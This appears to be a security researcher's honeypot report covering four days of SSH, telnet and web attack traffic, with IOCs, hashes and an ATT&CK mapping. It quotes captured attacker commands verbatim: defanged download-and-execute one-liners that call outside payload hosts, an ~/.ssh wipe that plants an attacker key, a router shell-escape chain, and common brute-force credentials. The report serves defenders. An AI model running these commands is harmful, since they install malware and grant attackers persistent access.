slatterysec.com/reports/2026/07/2026-07-24_2026-07-27-ssh-web-honeypot-report.html
sensors 8 up last session 4m ago 24h captures 312 unique src 87

slattery@sec:~/reports$ cat 2026-07-24_2026-07-27-ssh-web-honeypot-report.md

HONEYPOT REPORT  //  SSH + TELNET + WEB  //  2026-07-24 – 2026-07-27

2026-07-24 – 2026-07-27 — SSH, Telnet + Web Honeypot Report

period   2026-07-24 – 2026-07-27
sensors   Cowrie (SSH 2222 / telnet 2223) + nginx web sensor
host   VPS / RackNerd · containerized
SSH TELNET WEB ALERT REDTAIL MDRFCKR
SSH + TELNET SESSIONS
42,874
over 4 days
AUTH ATTEMPTS
40,525
31,364 succeeded
UNIQUE SOURCE IPs
865
top: 80.190.82.187
PAYLOAD DOWNLOADS
742
1 unique URL
FILE UPLOADS
54
Redtail multi-arch
WEB REQUESTS
5,436
707 unique IPs

SSH and telnet connection volume by day

580
07-24
30,622
07-25
6,231
07-26
5,441
07-27

Log filenames lag their contents by one day (UTC rollover); all figures here are keyed on record timestamps, not filenames.

Executive summary

One host dominates this period so completely that the aggregate numbers are close to meaningless without separating it out. 80.190.82.187 opened 27,509 sessions — 64% of everything the SSH sensor saw across four days — and in each one it issued a single command: echo -e "\x6F\x6B", which decodes to the string ok. No credentials harvested, no payload, no follow-up. It is a liveness check being run at industrial scale, and it produced the 30,622-session spike on July 25 that would otherwise look like an attack.

Excluding that single source, the period runs about 3,800 sessions per day — consistent with the days either side of it. A volume graph without this caveat would be actively misleading, which is the argument for publishing per-source breakdowns rather than daily totals.

Underneath the noise, two campaigns continued unchanged. The mdrfckr SSH key implant ran 708 times, following its usual sequence: clear immutable flags on ~/.ssh, delete the directory, recreate it, and write a single attacker-controlled authorized_keys. Every instance wrote the identical file — sha256 a8460f44… — which means one operator, one key, and no per-target customization.

The Redtail cryptominer also reappeared with the same multi-architecture upload set: clean.sh, setup.sh, and binaries for arm7, arm8, i686, riscv, and x86_64. Shipping a RISC-V build to a honeypot that has advertised nothing about its architecture is a reasonable indicator that the operator is spraying rather than targeting.

The web sensor is quieter but shows the same actor. The user-agent libredtail-http appears 208 times — the Redtail campaign hitting HTTP and SSH from the same toolkit, which is the cross-sensor link worth following.

Notable sessions — SSH and telnet

2026-07-25T00:00:00Z VOLUME ANOMALY 80.190.82.187
27,509 sessions in a single day, each issuing one hex-encoded echo and disconnecting. Responsible for the entire July 25 spike.
sessions: 27,509
command: echo -e "\x6F\x6B" → ok
auth: succeeded — Cowrie accepts any credential
hassh: 01ca35584ad5a1b66cf6a9846b5b2821
assessment: liveness/reachability probe, not exploitation
2026-07-25T04:44:44Z TELNET IMPLANT 36.32.156.65
318-command telnet session walking a vendor CLI escape chain into a shell before fingerprinting.
protocol: telnet
session: 55177b820ed7
chain: start → enable → config terminal → system → linuxshell → shell → sh
marker: echo -e '\x7A\x77\x7A\x75\x6E' → zwzun
note: escape sequence targets embedded router/DVR firmware CLIs
2026-07-26T13:58:40Z PAYLOAD DROP 92.209.215.59
Architecture check followed by a busybox-only fetch of a BlahajNet binary, executed and deleted in one line.
session: cbce15a682aa
recon: ps -p $$ -o comm= ; uname -m
fetch: busybox wget -q -O /tmp/.x86_64 hxxp://51.75.118.165:20130/dl/BlahajNet.x86_64
execute: chmod 777 /tmp/.x86_64 && /tmp/.x86_64; rm -f /tmp/.x86_64
note: busybox-prefixed wget implies expectation of an embedded target
2026-07-26T01:37:06Z PAYLOAD DROP 45.198.224.5
Belt-and-braces retrieval running wget and curl against the same URL, then executing and cleaning up.
session: 88d936543bda
command: wget hxxp://5.182.210.61/ok -O /tmp/ok; curl hxxp://5.182.210.61/ok -o /tmp/ok; chmod 777 /tmp/ok; sh /tmp/ok; rm -rf /tmp/ok; rm -rf /tmp/ok.1
note: the trailing /tmp/ok.1 cleanup implies the author expects both tools to succeed
2026-07-25T00:00:00Z KEY IMPLANT multiple sources
mdrfckr authorized_keys overwrite, 708 executions, byte-identical file every time.
sequence: cd ~; chattr -ia .ssh; lockr -ia .ssh → rm -rf .ssh && mkdir .ssh → echo ssh-rsa … > authorized_keys
key comments: mdrfckr, rsa-key-20230629
sha256: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
technique: T1098.004 — SSH Authorized Keys

Notable sessions — web

2026-07-25 – 2026-07-27 REDTAIL / HTTP libredtail-http
208 requests carrying the Redtail campaign's own HTTP user-agent, linking web probes to the SSH payload activity.
user-agent: libredtail-http
requests: 208
significance: same operator across two sensors and two protocols
2026-07-25 – 2026-07-27 CONFIG DISCLOSURE distributed
Sustained probing for environment and version-control files across several path variants.
paths: /.env /api/.env /app/.env /.env.development /.env.local /.git/config
combined hits: 137
note: the variant list is the tell — this is a wordlist, not a targeted attempt
2026-07-25 – 2026-07-27 IOT EXPLOIT distributed
Requests to embedded-device endpoints associated with known router and camera vulnerabilities.
paths: /SDK/webLanguage (80) /goform/set_LimitClient_cfg (19)
targets: AVTECH DVR firmware; Tenda router configuration endpoint
scanners: zgrab/0.x, Go-http-client/1.1

Indicators

Payload hosts and URLs

Reputation figures are AbuseIPDB confidence scores with total report counts in parentheses. Read them against the source addresses further down.

hostservesrefsscorenetwork
217.60.195.113Redtail telnet loader over HTTPS, cert validation disabled — nothing captured2029% (7)NL · SWISSNET LLC
5.182.210.61/ok shell script, fetched with wget and curl in one line60% (1)NL · SpectraIP B.V.
51.75.118.165BlahajNet.x86_64 and loader.sh on :2013029% (1)FR · OVH SAS

Payload hashes

Each hash links to VirusTotal rather than carrying a transcribed detection count, which would be stale within a month.

sha256seen asdeliveryobs
8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878b
virustotal → 07-25 → 07-30
Redtail staging archive 130.12.180.51 (+2) 14
197c74408e15bd1168105f564f96aace4fd4819961b724630bf5a6be4878daf8
virustotal → 07-25 → 07-30
clean.sh SCP upload · 130.12.180.51 (+2) 14
31d4181843b1ed10a7e7cb3f108f6d6c50a7a4452ee52ddacabe8ca77260615e
virustotal → 07-25 → 07-30
setup.sh SCP upload · 130.12.180.51 (+2) 14
1eecf2377d20768c28d741e21affaa53cf26db0d083efdbf43a92fa938b7e4be
virustotal → 07-25 → 07-30
redtail.arm7 SCP upload · 130.12.180.51 (+1) 10
be24e3ff143568fc82e42ed4aeee92e3f6f58c5fe3c5bb442cf4b998c90463d2
virustotal → 07-25 → 07-30
redtail.arm8 SCP upload · 130.12.180.51 (+1) 10
2f206563640dd66a743ffd493ce0e3c31a8fc5a24b9f5d2b540fc22d45c13d66
virustotal → 07-25 → 07-30
redtail.i686 SCP upload · 130.12.180.51 (+1) 10

Other captured artifacts

These were captured by the sensor and hashed alongside the payloads, but neither is a malware sample. Both are still usable indicators — the authorized_keys file is byte-identical across every mdrfckr instance, which makes it a reliable campaign signature. Expect low or zero detections on VirusTotal; that is the correct result for a text file and a newline, not a sign the lookup failed.

sha256what it isnoteobs
a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
virustotal → 204 source IPs
authorized_keys written by mdrfckr text file — a single attacker-controlled public key 708
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
virustotal → 38 source IPs
1-byte capture sha256 of a single newline character 22

Source addresses

Busiest sources on both sensors. Confidence tracks how often an address has been reported elsewhere, which is a measure of volume rather than of danger — compare these scores with the payload hosts above.

sourcesensorcountscorereportsnetwork
80.190.82.187ssh/telnet27,509100%222GB · Contabo GmbH
185.242.3.195ssh/telnet2,337100%19190DE · Felcloud
45.156.87.254ssh/telnet1,243100%3188NL · TechTies Inc.
91.92.40.19ssh/telnet762100%2472NL · TechTies Inc.
77.239.124.249ssh/telnet762100%1425NL · ROCKET & MARINICA LTD
45.156.87.253ssh/telnet762100%3040NL · TechTies Inc.
77.239.124.245ssh/telnet762100%1383NL · ROCKET & MARINICA LTD
45.156.87.13ssh/telnet762100%2493NL · TechTies Inc.
149.28.58.172web525100%49US · Vultr Holdings, LLC
51.81.153.40web483100%73US · OVH US LLC
68.232.175.178web47073%14US · Vultr Holdings, LLC
20.24.211.16web158100%169HK · Microsoft Corporation
20.203.142.71web157100%1698CH · Microsoft Corporation

Attacker behaviour

Credentials attempted

usernamepasswordattempts
root3245gs5662d34684
345gs5662d34345gs5662d34670
rootadmin118
adminadmin54
root1234567823
root12345622
root1234521
root<empty>20
root123420
root------fuck------18
rootroot18
root12318

Client fingerprints

fingerprinttypesessions
SSH-2.0-Goversion banner37,080
SSH-2.0-libssh_0.9.6version banner2,912
SSH-2.0-libssh_0.11.1version banner306
SSH-2.0-libssh-0.2version banner177
01ca35584ad5a1b66cf6a9846b5b2821HASSH27,508
0a07365cc01fa9fc82608ba4019af499HASSH5,936
f555226df1963d1d3c09daf865abdc9aHASSH2,892

Web paths requested

request URIhits
/797
<empty>287
/favicon.ico111
/SDK/webLanguage80
/login62
/.env45
/wp-admin/install.php?step=144
/robots.txt29
/.git/config23
/api/.env20
/app/.env20
/goform/set_LimitClient_cfg19
/.env.development18
/.env.local16

Raw log excerpts

slattery@sec:~/archive$ jq -r 'select(.eventid=="cowrie.command.input") | .input' cowrie.2026-07-24.json | sort | uniq -c | sort -rn | head -5

  27507 echo -e "\x6F\x6B"
   1070 uname -s -v -n -r -m
    980 echo OK
    708 cd ~; chattr -ia .ssh; lockr -ia .ssh
    708 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EA…

slattery@sec:~/archive$ jq -r 'select(.eventid=="cowrie.session.file_upload") | .filename' cowrie.2026-07-2*.json | sort | uniq -c

      7 clean.sh
      7 redtail.arm7
      7 redtail.arm8
      7 redtail.i686
      7 redtail.riscv
      7 redtail.x86_64

MITRE ATT&CK mapping

IDtechniqueobserved as
T1595.001Active Scanning: Scanning IP Blocks27,509 sessions from 80.190.82.187 issuing only echo -e "\x6F\x6B" — reachability probing, no exploitation attempted
T1110.001Brute Force: Password Guessing40,525 auth attempts; root/3245gs5662d34 and 345gs5662d34 dominate the set
T1078.001Valid Accounts: Default AccountsVendor-shipped pairs including admin/admin and empty-password root
T1059.004Command and Scripting Interpreter: Unix Shell318-command telnet session from 36.32.156.65 walking enable → config terminal → system → linuxshell → shell → sh
T1082System Information Discoveryuname -s -v -n -r -m (1,070x); ps -p $$ -o comm= ; uname -m before payload selection
T1222.002Linux File and Directory Permissions Modificationchattr -ia .ssh; lockr -ia .ssh clearing immutable flags ahead of the overwrite
T1098.004Account Manipulation: SSH Authorized Keys708 mdrfckr executions writing a byte-identical authorized_keys across 204 sources
T1105Ingress Tool Transferbusybox wget of BlahajNet.x86_64; wget and curl both issued against 5.182.210.61/ok in one line
T1573Encrypted Channel217.60.195.113 delivering over HTTPS with --no-check-certificate / curl -sk; nothing captured as a result
T1070.004Indicator Removal: File Deletionrm -f /tmp/.x86_64 and rm -rf /tmp/ok immediately after execution
T1595.002Active Scanning: Vulnerability ScanningWeb sensor: /.env variants (137 hits), /SDK/webLanguage (80), /goform/set_LimitClient_cfg (19)